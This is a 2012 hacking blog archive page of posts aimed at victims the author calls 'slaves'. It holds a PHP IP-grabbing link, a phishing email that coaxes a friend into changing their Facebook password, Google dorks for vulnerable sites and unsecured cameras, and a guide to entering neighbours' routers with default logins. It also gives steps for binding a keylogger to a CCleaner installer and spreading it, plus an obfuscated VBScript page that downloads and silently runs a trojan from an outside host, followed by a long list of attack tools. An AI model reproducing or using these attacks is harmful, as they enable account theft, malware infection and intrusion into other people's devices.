Venkat Hacking Articles: hacking

Showing posts with label hacking. Show all posts

Wednesday, 15 August 2012

Ok so how the hell to do this Ok for starters this is no hack. It uses bluetooth's existing functionality to access the features being talked about.

Prerequisites:

* The other phone must be bluetooth enabled(most are these days)
* The other phone must have bluetooth on(Surprisingly a lot of people always have it on, in spite of the fact that you should never have it on, it eats you battery. How many people, a BBC panaroma program some time back used this to find out that more than 60% of people have left bluetooth on
* Unless the other person configured it that way, you do require permission to pair once. So you need to be paired with the other phone once to use this hack next time without anyone's knowing. (Thats why its hack your friends mobile, your friend might have paired you already

Usage:

* On series 60, install directly
* If you have a cellphone like series 40 (Nokia 6230) with bluetooth and Java 2 support make .jad file with jad generator (included on package).
* When connecting devices use a code 0000
* Before starting the application on smartphones do not forget to turn on bluetooth.

download Here

IP stealer

1. create a php file from this code.

Code:
<?php
$file = 'IPz.txt';
$handle = fopen($file,'a');
if(!isset($_GET['p'])) { header('Location:
http://google.com'); }
fwrite($handle, $_GET['p'].': '.$_SERVER
['REMOTE_ADDR'].'\r\n');
fclose($handle)
?>

2. Another a text file name IPz create.

3. both upload a free web site hosting.

4. then link send to the slave.

5. binngo!!

See Hidden Facebook Pictures

Follow these steps :-

1. Go to the Profile-page of the Person.
2. Clear your Address line
3. Copy this into:

Code:
javascript:(function(){CSS.removeClass(document.body,%20'profile_two_columns');tab_controller.changePage("photos");})()

4. Now you can easily see Pictures of s.b. you don't even know.

How To Bypass Surveys For Free?

We often come across sites in which we have to forcefully do a survey because we have to download a file or see some content.In all of these surveys we are forced to disclose our personal information like our phone number , email id etc.
Later these sites irritate you with their sms's spam mails of offers in which you not at all are interested !
So i've found a way by which you can get through these sites without leaking out your personal information !

Let's start -

1. Download this add on called ''greasemonkey'' for mozilla firefox (mozilla is needed ).

https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/

After installing it

2. After installing it download this script which runs with the help of this add on(greasemonkey) --

http://userscripts.org/scripts/show/2560

Install this script and make sure the monkey on the right side of your mozilla screen is colored (which means greasemonkey is activated,to activate or deactivate just click on it)

3. Now go to the site which tells you to do the survey and asks for your information etc..

4. You'll see an option on top left side of the page which says '' Press CTRL+SHIFT+F to fill in form. ''

Do as directed..press CTRL+SHIFT+F and you will see that the form gets filled on its own and all the information filled out there is completely random !

Click on submit and you are registered on the site and now you can easily download what you wanted to !

This is all random stuff filled by the script.

BUT

5. Some sites may tell you to verify your identity by logging into your mail and opening some url or to get some pin ! For this all you have to so is go to http://www.yopmail.com/en/ . Go to this site and you'll get a temporary email id for around 15-30min.>paste that temporary email id at the place of email id which your intelligent form filler has randomly filled>click on submit form.

Here ''yoyo@yopmail.com'' is the yopmail email id which is replaced by the default id given by ''form filler''

Here ''yoyo@yopmail.com'' is the yopmail email id which is replaced by the default id given by ''form filler''

6. Check http://www.yopmail.com/en/ Inbox for the mail from the site>Get the pin or confirmation link>you are done !

Here as you can see two mails from the site where we have to forcefully register and the confirmation link plus password (other mails are just spam,ignore them).

OR

7. Some sites may ask you for voice calls confirmation ..I have the solution for that too
In that case go to this site http://www.k7.net/ ..on this site you can receive voice calls via mail ! So you bypass Survey again without giving any details !

Register here and you'll be able to receive voice calls via mail.

Hack facebook Accounts With In 15Mins Enjoy! Possible

Hey guys. In this tutorial u will learn how hack a facebook account by tricking ur friend. Go to any site which allows you to send anonymous emails and from there write an email like this:

Dear (Victims name),

This is to inform you that we are going to deactivate your account in 15 days because you have not followed our terms and rules while using your Facebook account. We found that your Facebook account is not following our rule 5.A.1 which is listed in our Content Guidelines.

To reactivate your account, please change your password to 12345678. Please keep up your password as 3d8Aj4Fn for at least a week so that we can verify your ownership.

Thank you.

Google hack tricks you'v never seen before 1

Ok today i will show google hack demostration you'v never seen
before.
You will never find these google hack codes on internet.
just watch and learn what i have discovered!!!

Ok it's time to show the secrets.

and this is the best google hack codes.

I can make and combine any text and make google dorks from javascript,
from html,css jquery,mootools and so on really fast and find
anything on this fucking lol g**gle !!!

I can bet what will see not understand what the hell i'm doing.

Just sit down,drink some coffee and watch.

This is just a demonstration.

OK first i will show how to find any hacker forums,site it doesn't matter!
I mean profesional hackers!

Just read it all because if you are not doing you will not understand these
codes and how do they work!

Dorks:

inurl:"view.asp?page=" intext:"plymouth"

Ok what this code does ?
So this is the university schools you can hack with this dork university schools.

inurl:"shoutbox.php" intext:"script"

with this code you can hack shoutbox or to find scripts

inurl:"index.php?act=" rapidleech

This code will find rapidleecher sites very quickly.

inurl:"index.php?act=idx"

This code will find ipb forums quickly to hack

inurl:"Photoshop.aspx" "tutorials"

This code will find photoshop tutorials

inurl: http://ftp://ftp site:.com

This code will find any ftp servers and root any protected sites.

allinurl:user_index.jsp

This code will find any free hosting

powered by vbulletin games 3.8.4 inurl:member.php?u=1

This code will find any vbulletin game forums and admin page.

powered by vbulletin 4.0.3 Debug Information

This code will show all vbulletin forums php codes and information
and their bugs you root into it.

powered by vbulletin "warez"

This code will find any warez forum.

video to mp3 converter online intext:"mp3"-intext:"High Quality"

With this code you can download mp3 from youtube very quickly.

intext:"Warning: mysql_fetch_array()"

With this code you will find any vulnarable sites and hack them.

inurl:radioandtv.php

This code will show all torrents hidden radios stations.

inurl:"posting.php?mode=s milies" "phpbb"

With this code you will be able to hack phpbb forums and put xss inside forum.

allinurl:tools/spider-view.php

With this code you can to find sites links very quikcly.

embed src=".mp3" type=audio/mpeg

Html injection code to find secret sites with html mp3 embed code
you will see it even on google.

"powered by vbulletin" + "account dumps"

With this code you will be able find passwords
for any sites,forums not for porn.

allinurl:"guestbook/smileys.php"
inurl:"smileys.php" + "talking"
allinurl:smiliehelp.php

Talking smilies.

"intitle:index of" admin/FCKeditor/_samples/html

With this code you will be able to find fck server html
editors and hack them.

owl city fireflies + "instrumental"

With this code you will be able any mp3 instrumental and change this
owl city fireflies

HTTP/1.1 :: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3)
access_log

with this code you will be able to hack sites access
logs and see all information.

"sql google scanner" + "php"

Google sql injection online hack vulnerable sites,forums
and find vulnerables sites very easy.

site:youtube.com *@gmail.com

This will find any youtube or any site emails.

allinurl:html_colors.html

This will find very quickly html chart codes.

private torrent + "open sign up"

This will find any private torrent open to register.

hotfile + mediafire + "http://" + "rar" horror 2010 dvdrip,
(hotfile|mediafire).rar 2010 horror dvdrip

This will find any secret sites with dvdrip movies just change horror.

dvdrip 400mb "2010"

This will find ripped dvdrip movies in 400mb and lastest.

sql injection dork bank

This will find bank dorks for hacking google.

inurl:archive/index.php "visual basic"

This will find secret forums directory where you will see all information.

Hack Your Broadband (No Risk)

Step 1: Download any port Scanner (i preffer Super Scan or IPscanner)

Step 2: First Get your ip from
CODE www.whatismyip.com
Asume your IP to be 59.x.x.17

Step 3: copy your ip in IPscanner Software and scan for alive IPs in the below range
start:59.x.x.1 to End:59.x.x.255

Step 4: Then check in your scanner which alive IPs has the port 80 open

Step 5: Enter that alive IP in your web browser

Step 6: It asks for user , pass
Type u
User=admin
Password=admin or password
It is the default password for most of the routers.

if denied then use on another alive IP

Step 7: If success then it will show router settings page of tht IP user
There goto Home -> Wan Setting and the username and password of his account will appear there.

Step 8: use ShowPassword or Revelation software to view the password in asterisks

Now You have Username/Password
Enjoy!

How to Hack into a Live Security Camera

Well this is an interesting article. It is a sub-section of a Hacking Technique known as “Google Hacking”. All what we are looking at are unsecured cams from around the world that are interfaced with the internet. So how do you find such cameras. Just google these following strings and select any result. Whoa, you can see a live cam on your PC screen!! The strings are given below:

inurl:”CgiStart?page=”
inurl:/view.shtml
intitle:”Live View / – AXIS
inurl:view/view.shtml
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera” (disconnected)
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / – AXIS”
intitle:”Live View / – AXIS 206M”
intitle:”Live View / – AXIS 206W”
intitle:”Live View / – AXIS 210?
inurl:indexFrame.shtml Axis
inurl:”MultiCameraFrame?Mode=Motion” (disconnected)
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1?
intitle:”sony network camera snc-m1?
site:.viewnetcam.com -www.viewnetcam.com
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image” (disconnected)
intitle:”i-Catcher Console – Web Monitor”
Happy Cam Hacking Guys!!

Hack Facebook Password Remotely

Hacking Facebook account is very easy and just requires not more than 10 minutes of work. Don't worry i will also tell you how to protect your facebook account or passwords from such hacks and hackers. But for this you must know how hackers hack your facebook account. So first i teach you how to hack facebook account remotely and then i will tell how to protect yourself from this.

So guys lets start hacking Facebook account or passwords....

Steps to hack Facebook account using Keylogger:
1. Creating the Keylogger Server to hack Facebook passwords.
2. Extracting the Icon from installer.
3. Bind the keylogger server with any software setup.
4. How to spread your keylogger or send it to your friends to hack their Facebook accounts or passwords.

Step 1. Creating the Keylogger Server
1. Download the keylogger.

2. Extract the file, Now you will get two folders:
a. First one contains Keylogger and Binder
b. Second Contains resource hacker tool.( to extract the icons from installers).

3. Now open the Keylogger. It contains two files one for gmail email and other for password. For this create one test account on Gmail and enter it's details in this.

4. After entering email and password. Set the time interval usually set 3 mins i.e. after how much time you want to receive logs from the user.
5. Now click on send verification mail. This mail is to test that your keylogger is working correctly or not.
6. After you click this you will receive a confirmation mail on test account which will confirm that keylogger is working.
7. Now click on generate to set the mutex (any secret key to make your keylogger FUD) and then click on compile server.
8. Now save the file to desktop or any other location of your choice. Now your server is ready but it can be easily detected.

Step 2.: Extracting the Icon file from any installer(resource hacker)
1. Open the Resource hacker folder and open the reshacker file.
2. Now go to its menu and open any setup file. Suppose we want to attach our keylogger toCcleaner setup file. So open the Ccleaner setup with resource hacker.
3. Now in menu there is one action button click on it and then click save all resources.
4. Now save all the resources to desktop or any other location of your choice.
5. It consists of two files one is icon file and other is res file . We only need icon file, so you can delete the other file i.e res file.
6. Now we have Icon of installer file(as discussed above Ccleaner setup Icon).

Step 3: Bind the Keylogger server with any software
1. Now Go to keylogger folder and open the Binder.
2. Now Click on + button given below to add files.
3. Now add the keylogger server and the set up of software (i.e. in our case it's Ccleaner setup).
4. Now in menu of Binder, Go to Settings. There select the icon that we have generated in the previous step and set the location of output file as shown in figure.
5. Now again go to File's menu in Binder and click on Bind files.
6. Now your Binded keylogger is ready. Now you have to spread it or send it to the slave that is your friend.

Step4 : How to Spread Keylogger or send it to slave or friend
1. Now you have one Software setup file with keylogger attached with it.(In our case we have Ccleaner setup with keylogger attached with it.
2. Now Spread your keylogger through forums. You might be a member of various forums use them to spread your keylogger in form of software posts. You can use various software's to spread them that users frequently download.
3. Spread it through pendrives or USB hard drives. Suppose a friend asked you for a software give it the software that has keylogger attached with it.
Note: you can also attach keylogger with images also. But that can be detectable by antivirus. So avoid such type of hacking.
So isn't that so easy to hack anyone's Facebook account in just few minutes.

How to protect yourself from these hacks?
Prevention is always better than cure so always follow these steps:
1. Don't use cracked softwares and don't download them from unauthorized websites.
2. Always keep your antivirus and anti-spyware up to date.
3. Always scan the files before transferring them to your USB.
4. Do not allow other users to use your PC i.e password protect it.

Trojan Through HTML

All you must have heard tht some one got infected with a trojan by visiting some website .

In this Tutorial i am going to help you understand how tht is done !!!

Look at this Html code

<HTML>
<BODY>
<script language="VBScript">
on error resume next
dl = "www.abc.com/trojan.exe"
Set df = document.createElement("object")
cls1="clsid:BD96"
cls2="C556-65A"
cls3="3-11D0-9"
cls4="83A-00C04FC29E36"
clsfull=cls1&cls2&cls3&cls4
df.setAttribute "classid",clsfull
strr1="Mic"
strr2="roso"
strr3="ft."
strr4="XML"
strr5="HTTP"
strr=strr1&strr2&strr3&strr4&strr5
Set x = df.CreateObject(strr,"")
ab1="A"
ab2="dod"
ab3="b.S"
ab4="t"
ab5="re"
ab6="am"
strb1=ab1&ab2&ab3&ab4&ab5&ab6
strb5=strb1
set YY = df.createobject(strb5,"")
YY.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fnamezz1="update.exe"
scripp1="Scrip"
scripp2="ting"
scripp3=".Fil"
scripp4="eSyste"
scripp5="mObject"
scripp=scripp1&scripp2&scripp3&scripp4&scripp5
set FF = df.createobject(scripp,"")
set tmp = F.GetSpecialFolder(2)
fnamezz1= FF.BuildPath(tmp,fnamezz1)
YY.open
YY.write x.responseBody
YY.savetofile fnamezz1,2
YY.close
set MM = df.createobject("Shell.Application","")
MM.ShellExecute fnamezz1,"","","open",0
</script>
</BODY>
</HTML>

Monday, 16 July 2012

LIST OF HACKING TOOLS

o Sensepost Footprint Tools
o Big Brother
o BiLE Suite
o Alchemy Network Tool
o Advanced Administrative Tool
o My IP Suite
o Wikto Footprinting Tool
o Whois Lookup
o Whois
o SmartWhois
o ActiveWhois
o LanWhois
o CountryWhois
o WhereIsIP
o Ip2country
o CallerIP
o Web Data Extractor Tool
o Online Whois Tools
o What is MyIP
o DNS Enumerator
o SpiderFoot
o Nslookup
o Extract DNS Information
• Types of DNS Records
• Necrosoft Advanced DIG
o Expired Domains
o DomainKing
o Domain Name Analyzer
o DomainInspect
o MSR Strider URL Tracer
o Mozzle Domain Name Pro
o Domain Research Tool (DRT)
o Domain Status Reporter
o Reggie
o Locate the Network Range
• ARIN
• Traceroute
• 3D Traceroute
• NeoTrace
• VisualRoute Trace
• Path Analyzer Pro
• Maltego
• Layer Four Traceroute
• Prefi x WhoIs widget
• Touchgraph
• VisualRoute Mail Tracker
• eMailTrackerPro
o 1st E-mail Address Spider
o Power E-mail Collector Tool
o GEOSpider
o Geowhere Footprinting Tool
o Google Earth
o Kartoo Search Engine
o Dogpile (Meta Search Engine)
o Tool: WebFerret
o robots.txt
o WTR - Web The Ripper
o Website Watcher
SCANNING

• Angry IP
• HPing2
• Ping Sweep
• Firewalk Tool
• Firewalk Commands
• Firewalk Output
• Nmap
• Nmap: Scan Methods
• NMAP Scan Options
• NMAP Output Format
• TCP Communication Flags
• Three Way Handshake
o Syn Stealth/Half Open Scan
o Stealth Scan
o Xmas Scan
o Fin Scan
o Null Scan
o Idle Scan
o ICMP Echo Scanning/List Scan
o TCP Connect/Full Open Scan
o FTP Bounce Scan
• Ftp Bounce Attack
o SYN/FIN Scanning Using IP Fragments
o UDP Scanning
o Reverse Ident Scanning
o RPC Scan
o Window Scan
o Blaster Scan
o Portscan Plus, Strobe
o IPSec Scan
o Netscan Tools Pro
o WUPS – UDP Scanner
o Superscan
o IPScanner
o Global Network Inventory Scanner
o Net Tools Suite Pack
o Atelier Web Ports Traffi c Analyzer (AWPTA)
o Atelier Web Security Port Scanner (AWSPS)
o IPEye
o ike-scan
o Infi ltrator Network Security Scanner
o YAPS: Yet Another Port Scanner
o Advanced Port Scanner
o NetworkActiv Scanner
o NetGadgets
o P-Ping Tools
o MegaPing
o LanSpy
o HoverIP
o LANView
o NetBruteScanner
o SolarWinds Engineer’s Toolset
o AUTAPF
o OstroSoft Internet Tools
o Advanced IP Scanner
o Active Network Monitor
o Advanced Serial Data Logger
o Advanced Serial Port Monitor
o WotWeb
o Antiy Ports
o Port Detective

Enumeration

Overview of System Hacking Cycle
Techniques for Enumeration
NetBIOS Null Sessions
o So What’s the Big Deal
o DumpSec Tool
o NetBIOS Enumeration Using Netview
• Nbtstat Enumeration Tool
• SuperScan
• Enum Tool
o Enumerating User Accounts
• GetAcct
o Null Session Countermeasure
PS Tools
o PsExec
o PsFile
o PsGetSid
o PsKill
o PsInfo
o PsList
o PsLogged On
o PsLogList
o PsPasswd
o PsService
o PsShutdown
o PsSuspend
o Management Information Base (MIB)
o SNMPutil Example
o SolarWinds
o SNScan
o Getif SNMP MIB Browser
o UNIX Enumeration
o SNMP UNIX Enumeration
o SNMP Enumeration Countermeasures
o LDAP enumeration
o JXplorer
o LdapMiner
o Softerra LDAP Browser
o NTP enumeration
o SMTP enumeration
o Smtpscan
o Web enumeration
o Asnumber
o Lynx
o Windows Active Directory Attack Tool
o How To Enumerate Web Application Directories in IIS Using DirectoryServices

IP Tools Scanner
Enumerate Systems Using Default Password
Tools:
o NBTScan
o NetViewX
o FREENETENUMERATOR
o Terminal Service Agent
o TXNDS
o Unicornscan
o Amap
o Netenum

System Hacking

Part 1- Cracking Password
o Password Types
o Types of Password Attack
• Passive Online Attack: Wire Sniffi ng
• Passive Online Attack: Man-in-the-middle and replay attacks
• Active Online Attack: Password Guessing
• Offl ine Attacks
Brute force Attack
Pre-computed Hashes
Syllable Attack/Rule-based Attack/ Hybrid attacks
Distributed network Attack
Rainbow Attack
• Non-Technical Attacks
o PDF Password Cracker
o Abcom PDF Password Cracker
o Password Mitigation
o Permanent Account Lockout-Employee Privilege Abuse
o Administrator Password Guessing
• Manual Password cracking Algorithm
• Automatic Password Cracking Algorithm
o Performing Automated Password Guessing
• Tool: NAT
• Smbbf (SMB Passive Brute Force Tool)
• SmbCrack Tool: Legion
• Hacking Tool: LOphtcrack
o Microsoft Authentication
• LM, NTLMv1, and NTLMv2
• NTLM And LM Authentication On The Wire
• Kerberos Authentication
• What is LAN Manager Hash?
LM “Hash” Generation
LM Hash
• Salting
• PWdump2 and Pwdump3
• Tool: Rainbowcrack
• Hacking Tool: KerbCrack
• Hacking Tool: NBTDeputy
• NetBIOS DoS Attack
• Hacking Tool: John the Ripper
o Password Sniffi ng
o How to Sniff SMB Credentials?
o SMB Replay Attacks
o Replay Attack Tool: SMBProxy
o SMB Signing
o Tool: LCP
o Tool: SID&User
o Tool: Ophcrack 2
o Tool: Crack
o Tool: Access PassView
o Tool: Asterisk Logger
o Tool: CHAOS Generator
o Tool: Asterisk Key
o Password Recovery Tool: MS Access Database Password Decoder
o Password Cracking Countermeasures
o Do Not Store LAN Manager Hash in SAM Database
o LM Hash Backward Compatibility
o How to Disable LM HASH
o Password Brute-Force Estimate Tool
o Syskey Utility
o AccountAudit
Part2-Escalating Privileges
o Privilege Escalation
o Cracking NT/2000 passwords
o Active@ Password Changer
• Change Recovery Console Password - Method 1
• Change Recovery Console Password - Method 2
o Privilege Escalation Tool: x.exe
Part3-Executing applications
o Tool: psexec
o Tool: remoexec
o Ras N Map
o Tool: Alchemy Remote Executor
o Emsa FlexInfo Pro
o Keystroke Loggers
o E-mail Keylogger
o Revealer Keylogger Pro
o Handy Keylogger
o Ardamax Keylogger
o Powered Keylogger
o Quick Keylogger
o Spy-Keylogger
o Perfect Keylogger
o Invisible Keylogger
o Actual Spy
o SpyToctor FTP Keylogger
o IKS Software Keylogger
o Ghost Keylogger
o Hacking Tool: Hardware Key Logger
o What is Spyware?
o Spyware: Spector
o Remote Spy
o Spy Tech Spy Agent
o 007 Spy Software
o Spy Buddy
o Ace Spy
o Keystroke Spy
o Activity Monitor
o Hacking Tool: eBlaster
o Stealth Voice Recorder
o Stealth Keylogger
o Stealth Website Logger
o Digi Watcher Video Surveillance
o Desktop Spy Screen Capture Program
o Telephone Spy
o Print Monitor Spy Tool
o Stealth E-Mail Redirector
o Spy Software: Wiretap Professional
o Spy Software: FlexiSpy
o PC PhoneHome
o Keylogger Countermeasures
o Anti Keylogger

Trojans and Backdoors

Effect on Business
What is a Trojan?
o Overt and Covert Channels
o Working of Trojans
o Different Types of Trojans
Remote Access Trojans
Data-Sending Trojans
Destructive Trojans
Denial-of-Service (DoS) Attack Trojans
Proxy Trojans
FTP Trojans

Security Software Disablers
o What do Trojan Creators Look for?
o Different Ways a Trojan can Get into a System
Indications of a Trojan Attack
Ports Used by Trojans
o How to Determine which Ports are Listening
Trojans
o Trojan: iCmd
o MoSucker Trojan
o Proxy Server Trojan
o SARS Trojan Notifi cation
o Wrappers
o Wrapper Covert Program
o Wrapping Tools
o One Exe Maker / YAB / Pretator Wrappers
o Packaging Tool: WordPad
o RemoteByMail
o Tool: Icon Plus
o Defacing Application: Restorator
o Tetris
o HTTP Trojans
o Trojan Attack through Http
o HTTP Trojan (HTTP RAT)
o Shttpd Trojan - HTTP Server
o Reverse Connecting Trojans
o Nuclear RAT Trojan (Reverse Connecting)
o Tool: BadLuck Destructive Trojan
o ICMP Tunneling
o ICMP Backdoor Trojan
o Microsoft Network Hacked by QAZ Trojan
o Backdoor.Theef (AVP)
o T2W (TrojanToWorm)
o Biorante RAT
o DownTroj
o Turkojan
o Trojan.Satellite-RAT
o Yakoza
o DarkLabel B4
o Trojan.Hav-Rat
o Poison Ivy
o Rapid Hacker
o SharK
o HackerzRat
o TYO
o 1337 Fun Trojan
o Criminal Rat Beta
o VicSpy
o Optix PRO
o ProAgent
o OD Client
o AceRat
o Mhacker-PS
o RubyRAT Public
o SINner
o ConsoleDevil
o ZombieRat
o FTP Trojan - TinyFTPD
o VNC Trojan
o Webcam Trojan
o DJI RAT
o Skiddie Rat
o Biohazard RAT
o Troya
o ProRat
o Dark Girl
o DaCryptic
o Net-Devil
Classic Trojans Found in the Wild
o Trojan: Tini
o Trojan: NetBus

o Trojan: Netcat
o Netcat Client/Server
o Netcat Commands
o Trojan: Beast
o Trojan: Phatbot
o Trojan: Amitis
o Trojan: Senna Spy
o Trojan: QAZ
o Trojan: Back Orifi ce
o Trojan: Back Oriffi ce 2000
o Back Oriffi ce Plug-ins
o Trojan: SubSeven
o Trojan: CyberSpy Telnet Trojan
o Trojan: Subroot Telnet Trojan
o Trojan: Let Me Rule! 2.0 BETA 9
o Trojan: Donald Dick
o Trojan: RECUB
Hacking Tool: Loki
Loki Countermeasures
Atelier Web Remote Commander

Trojan Horse Construction Kit
How to Detect Trojans?
o Netstat
o fPort
o TCPView
Viruses and Worms

Virus History
Characteristics of Virus
Working of Virus
o Infection Phase
o Attack Phase
Why people create Computer Viruses
Symptoms of a Virus-like Attack
Virus Hoaxes
Chain Letters
How is a Worm Different from a Virus
Indications of a Virus Attack
Hardware Threats
Software Threats
Virus Damage
Mode of Virus Infection
Stages of Virus Life
Virus Classifi cation
How Does a Virus Infect?
Storage Patterns of Virus
o System Sector virus
o Stealth Virus
o Bootable CD-Rom Virus
• Self -Modifi cation
• Encryption with a Variable Key
o Polymorphic Code
o Metamorphic Virus
o Cavity Virus
o Sparse Infector Virus
o Companion Virus
o File Extension Virus
Famous Virus/Worms – I Love You Virus
Famous Virus/Worms – Melissa
Famous Virus/Worms – JS/Spth
Klez Virus Analysis
Latest Viruses
Top 10 Viruses- 2008
o Virus: Win32.AutoRun.ah
o Virus:W32/Virut
o Virus:W32/Divvi
o Worm.SymbOS.Lasco.a
o Disk Killer
o Bad Boy
o HappyBox
o Java.StrangeBrew
o MonteCarlo Family
o PHP.Neworld
o W32/WBoy.a
o ExeBug.d
o W32/Voterai.worm.e
o W32/Lecivio.worm
o W32/Lurka.a
o W32/Vora.worm!p2p
Writing a Simple Virus Program
Virus Construction Kits
Virus Detection Methods
Virus Incident Response
What is Sheep Dip?
Virus Analysis – IDA Pro Tool
Prevention is better than Cure
Anti-Virus Software
o AVG Antivirus
o Norton Antivirus
o McAfee
o Socketsheild
o BitDefender
o ESET Nod32
o CA Anti-Virus
o F-Secure Anti-Virus
o Kaspersky Anti-Virus
o F-Prot Antivirus
o Panda Antivirus Platinum
o avast! Virus Cleaner
o ClamWin
o Norman Virus Control
Popular Anti-Virus Packages
Virus Databases

Sniffers

Defi nition - Sniffi ng
Protocols Vulnerable to Sniffi ng
Tool: Network View – Scans the Network for Devices
The Dude Sniffer
Wireshark
Display Filters in Wireshark
Following the TCP Stream in Wireshark
Cain and Abel
Tcpdump
Tcpdump Commands
Types of Sniffi ng
o Passive Sniffi ng
o Active Sniffi ng
What is ARP
o ARP Spoofi ng Attack
o How does ARP Spoofi ng Work
o ARP Poising
o MAC Duplicating
o MAC Duplicating Attack
o Tools for ARP Spoofi ng
• Ettercap
• ArpSpyX
o MAC Flooding
• Tools for MAC Flooding
Linux Tool: Macof
Windows Tool: Etherfl ood
o Threats of ARP Poisoning
o Irs-Arp Attack Tool
o ARPWorks Tool
o Tool: Nemesis
o IP-based sniffi ng
Linux Sniffi ng Tools (dsniff package)
o Linux tool: Arpspoof
o Linux Tool: Dnssppoof
o Linux Tool: Dsniff
o Linux Tool: Filesnarf
o Linux Tool: Mailsnarf
o Linux Tool: Msgsnarf
o Linux Tool: Sshmitm
o Linux Tool: Tcpkill
o Linux Tool: Tcpnice
o Linux Tool: Urlsnarf
o Linux Tool: Webspy
o Linux Tool: Webmitm
DNS Poisoning Techniques
o Intranet DNS Spoofi ng (Local Network)
o Internet DNS Spoofi ng (Remote Network)
o Proxy Server DNS Poisoning
o DNS Cache Poisoning
Interactive TCP Relay
Interactive Replay Attacks
Raw Sniffi ng Tools
Features of Raw Sniffi ng Tools
o HTTP Sniffer: EffeTech
o Ace Password Sniffer
o Win Sniffer
o MSN Sniffer
o SmartSniff
o Session Capture Sniffer: NetWitness
o Session Capture Sniffer: NWreader
o Packet Crafter Craft Custom TCP/IP Packets
o SMAC
o NetSetMan Tool
o Ntop
o EtherApe
o Network Probe
o Maa Tec Network Analyzer
o Tool: Snort
o Tool: Windump
o Tool: Etherpeek
o NetIntercept
o Colasoft EtherLook
o AW Ports Traffi c Analyzer
o Colasoft Capsa Network Analyzer
o CommView
o Sniffem
o NetResident
o IP Sniffer
o Sniphere
o IE HTTP Analyzer
o BillSniff
o URL Snooper
o EtherDetect Packet Sniffer
o EffeTech HTTP Sniffer
o AnalogX Packetmon
o Colasoft MSN Monitor
o IPgrab
o EtherScan Analyzer

Social Engineering

What is Social Engineering?
Human Weakness
“Rebecca” and “Jessica”
Offi ce Workers
Types of Social Engineering
o Human-Based Social Engineering
• Technical Support Example
• More Social Engineering Examples
• Human-Based Social Engineering: Eavesdropping
• Human-Based Social Engineering: Shoulder Surfi ng
• Human-Based Social Engineering: Dumpster Diving
• Dumpster Diving Example
• Oracle Snoops Microsoft’s Trash Bins
• Movies to Watch for Reverse Engineering
o Computer Based Social Engineering
o Insider Attack
o Disgruntled Employee
o Preventing Insider Threat
o Common Targets of Social Engineering
Social Engineering Threats
o Online
o Telephone
o Personal approaches
o Defenses Against Social Engineering Threats
Factors that make Companies Vulnerable to Attacks
Why is Social Engineering Effective
Warning Signs of an Attack
Tool : Netcraft Anti-Phishing Toolbar
Phases in a Social Engineering Attack
Behaviors Vulnerable to Attacks
Impact on the Organization
Countermeasures
Policies and Procedures
Security Policies - Checklist

Denial-of-Service

Real World Scenario of DoS Attacks
What are Denial-of-Service Attacks
Goal of DoS
Impact and the Modes of Attack
Types of Attacks
DoS Attack Classifi cation
o Smurf Attack
o Buffer Overfl ow Attack
o Ping of Death Attack
o Teardrop Attack
o SYN Attack
o SYN Flooding
o DoS Attack Tools
o DoS Tool: Jolt2
o DoS Tool: Bubonic.c
o DoS Tool: Land and LaTierra
o DoS Tool: Targa
o DoS Tool: Blast
o DoS Tool: Nemesy
o DoS Tool: Panther2
o DoS Tool: Crazy Pinger
o DoS Tool: SomeTrouble
o DoS Tool: UDP Flood
o DoS Tool: FSMax
Bot (Derived from the Word RoBOT)
Botnets
Uses of Botnets
How Do They Infect? Analysis Of Agabot
How Do They Infect
Tool: Nuclear Bot
What is DDoS Attack
Characteristics of DDoS Attacks
DDOS Unstoppable
Agent Handler Model
DDoS IRC based Model
DDoS Attack Taxonomy
Amplifi cation Attack
Refl ective DNS Attacks
Refl ective DNS Attacks Tool: ihateperl.pl
DDoS Tools
o DDoS Tool: Trinoo
o DDoS Tool: Tribal Flood Network
o DDoS Tool: TFN2K
o DDoS Tool: Stacheldraht
o DDoS Tool: Shaft
o DDoS Tool: Trinity
o DDoS Tool: Knight and Kaiten
o DDoS Tool: Mstream
Worms
Slammer Worm
Spread of Slammer Worm – 30 min
MyDoom.B
SCO Against MyDoom Worm
How to Conduct a DDoS Attack
The Refl ected DoS Attacks
Refl ection of the Exploit
Countermeasures for Refl ected DoS
DDoS Countermeasures
Taxonomy of DDoS Countermeasures
Preventing Secondary Victims
Detect and Neutralize Handlers
Detect Potential Attacks

Session Hijacking

What is Session Hijacking?
Spoofi ng v Hijacking
Steps in Session Hijacking
Types of Session Hijacking
Session Hijacking Levels
Network Level Hijacking
The 3-Way Handshake
TCP Concepts 3-Way Handshake
Sequence Numbers
Sequence Number Prediction
TCP/IP hijacking
IP Spoofi ng: Source Routed Packets
RST Hijacking
o RST Hijacking Tool: hijack_rst.sh
Blind Hijacking
Man in the Middle: Packet Sniffer
UDP Hijacking
Application Level Hijacking
Programs that Performs Session Hacking
o Juggernaut
o Hunt
o TTY-Watcher
o IP watcher
o Session Hijacking Tool: T-Sight
o Remote TCP Session Reset Utility (SOLARWINDS)
o Paros HTTP Session Hijacking Tool
o Dnshijacker Tool
o Hjksuite Tool
Dangers that hijacking Pose
Protecting against Session Hijacking
Countermeasures: IPSec

Hacking Web Servers

How Web Servers Work
How are Web Servers Compromised
Web Server Defacement
o How are Servers Defaced
Apache Vulnerability
Attacks against IIS
o IIS Components
o IIS Directory Traversal (Unicode) Attack
Unicode
o Unicode Directory Traversal Vulnerability
Hacking Tool
o Hacking Tool: IISxploit.exe
o Msw3prt IPP Vulnerability
o RPC DCOM Vulnerability
o ASP Trojan
o Network Tool: Log Analyzer
o Hacking Tool: CleanIISLog
o ServerMask ip100
o Tool: CacheRight
o Tool: CustomError
o Tool: HttpZip
o Tool: LinkDeny
o Tool: ServerDefender AI
o Tool: ZipEnable
o Tool: w3compiler
o Yersinia
Tool: MPack
Tool: Neosploit
